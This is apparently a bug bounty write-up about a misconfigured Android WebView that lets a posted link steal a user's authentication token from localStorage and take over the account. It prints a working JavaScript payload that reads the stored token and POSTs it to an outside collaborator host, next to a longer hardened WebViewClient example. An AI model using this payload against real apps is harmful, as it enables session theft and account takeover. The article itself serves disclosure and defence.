Stealing an authentication token with one click on a misconfigured WebView

Kerolos Atef
3 min read · Apr 8, 2023

Howdy friend, I hope all is well at your end!

In this write-up, I will discuss an Android WebView attack that I discovered in several of the apps I was testing, among them an app in a private bug bounty program on HackerOne. I will show how I achieved a one-click account takeover simply by posting a message, comment, or post containing a link to a website I controlled. Once an Android user clicked the link, I, as the attacker, was able to steal their authentication token and their account data.

What is WebView?

WebView is a component that lets developers display web pages inside their apps, including support for JavaScript, cookies, and user input. It renders HTML, CSS, and images and lets users interact with web content, for example by clicking links and submitting forms. Essentially, it is an embedded browser for app content.

Details:

During my hunt on an Android app in a private bug bounty program on HackerOne, I noticed that while I browsed the app, the WebView executed the following code, which stored the user’s authentication token and account data in the page’s localStorage:

javascript:window.localStorage.setItem("u", JSON.stringify({"oldToken":"Basic NjQwMDE1N2EwMTA4MzI0NTI1Y2NiOWJmOmQ3MDVkZDkzLWRjMGMtNxxxxxxxx","id":"61957b5843xxxxx","email":"secret@myemail.com","username":"0xWise","referralCode":"","hasApiAccount":false,"hasMobileAccount":true,"hasWebAccount":true,"hasPasswordSet":true}));

This code sets the localStorage item “u” to the JSON object shown above. That object contains an “oldToken” field equal to my account’s JWT auth token (note: despite the name, the token is valid, not old).

The WebView activity was configured with setJavaScriptEnabled(true) and setDomStorageEnabled(true). This means that any link clicked and opened inside the WebView can execute JavaScript and access the localStorage and sessionStorage objects without any restriction.
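Two things together made the attack work, and a fix has to address both. First, the WebView loaded arbitrary, user-posted URLs in-app rather than handing them to the system browser. Second, localStorage is partitioned by origin, so a page on the attacker’s host could only read item “u” because the app executed that setItem call against whatever page the WebView had just loaded, the attacker’s page included. The following hardened WebViewClient is an added example written for this article, not code from the affected app: it allowlists first-party hosts, sends every other link to the system browser (which cannot see the app’s WebView storage), and never passes a credential into page JavaScript. The host names are hypothetical; the real app’s domain does not appear in the write-up.

```java
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import android.webkit.WebResourceRequest;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

/** Hardened WebView setup: keeps attacker-controlled links out of the app's WebView. */
public final class HardenedWebViewClient extends WebViewClient {

    // Hypothetical first-party hosts (assumption: the write-up does not name the app's domain).
    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("app.example.com", "www.example.com"));

    private final Context appContext;

    public HardenedWebViewClient(Context context) {
        this.appContext = context.getApplicationContext();
    }

    /** True only for https URLs whose host is on the first-party allowlist. */
    static boolean isFirstParty(Uri uri) {
        if (uri == null || !"https".equalsIgnoreCase(uri.getScheme())) {
            return false;
        }
        String host = uri.getHost();
        return host != null && ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }

    /** API 24+ signature; older targets override the (WebView, String) variant the same way. */
    @Override
    public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
        Uri target = request.getUrl();
        if (isFirstParty(target)) {
            return false; // first-party page: let the WebView load it
        }
        // Anything else, including links posted in comments or profiles, opens in the
        // system browser, which shares no localStorage or cookies with this WebView.
        Intent intent = new Intent(Intent.ACTION_VIEW, target);
        intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        appContext.startActivity(intent);
        return true;
    }

    @Override
    public void onPageFinished(WebView view, String url) {
        super.onPageFinished(view, url);
        // The vulnerable app ran javascript:window.localStorage.setItem("u", <token JSON>)
        // at this point for every page, so the token landed in whichever origin had just
        // loaded. Hardened form: never hand the token to page JavaScript, and refuse to
        // inject any script into a page that is not first-party.
        if (!isFirstParty(Uri.parse(url))) {
            return;
        }
        // Only non-secret state is passed, and only to first-party pages.
        view.evaluateJavascript("window.__appPlatform = 'android';", null);
    }

    /** Applies the settings; JavaScript and DOM storage stay on only because the first-party web app needs them. */
    public static void configure(WebView webView, Context context) {
        WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(true);   // required by the first-party web app
        settings.setDomStorageEnabled(true);   // acceptable only together with the host allowlist above
        settings.setAllowFileAccess(false);    // no file:// pages inside the WebView
        settings.setAllowContentAccess(false); // no content:// providers either
        webView.setWebViewClient(new HardenedWebViewClient(context));
    }
}
```

The token itself should stay in the app process (for example in EncryptedSharedPreferences) and be attached to the app’s own API calls from native code; if the web side needs an authenticated session, let the server set an HttpOnly cookie scoped to the first-party domain rather than writing a bearer token into storage that any loaded page can read.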

In order to detect and/or exploit this vulnerability, I hosted the following script on my server (on the Replit hosting service):

alert(window.localStorage.getItem('u'));
fetch('https://eq8u3apw7h7746qv0l5madalnct3ht5i.oastify.com/log', {
    method: 'POST',
    mode: 'no-cors',
    body: window.localStorage.getItem('u')
});

Afterward, I navigated to the Android app and created a post that contained my Replit server’s URL (e.g. https://xss-redacted.repl.co). When the victim, a user of the Android app, clicked on the link, the results were as follows:

Impact

Attacker-controlled URLs placed in posts, comments, the profile website field, etc., are opened inside the WebView, which lets the attacker read the user’s data from localStorage. This data includes the user’s authentication token, leading to an Account Takeover (ATO).

Additionally, this vulnerability can lead to mass account takeover, as an attacker can easily spread the exploit URL through posts, comments, etc.

Thank you for reading!
If you have any questions, feel free to DM me on Twitter.
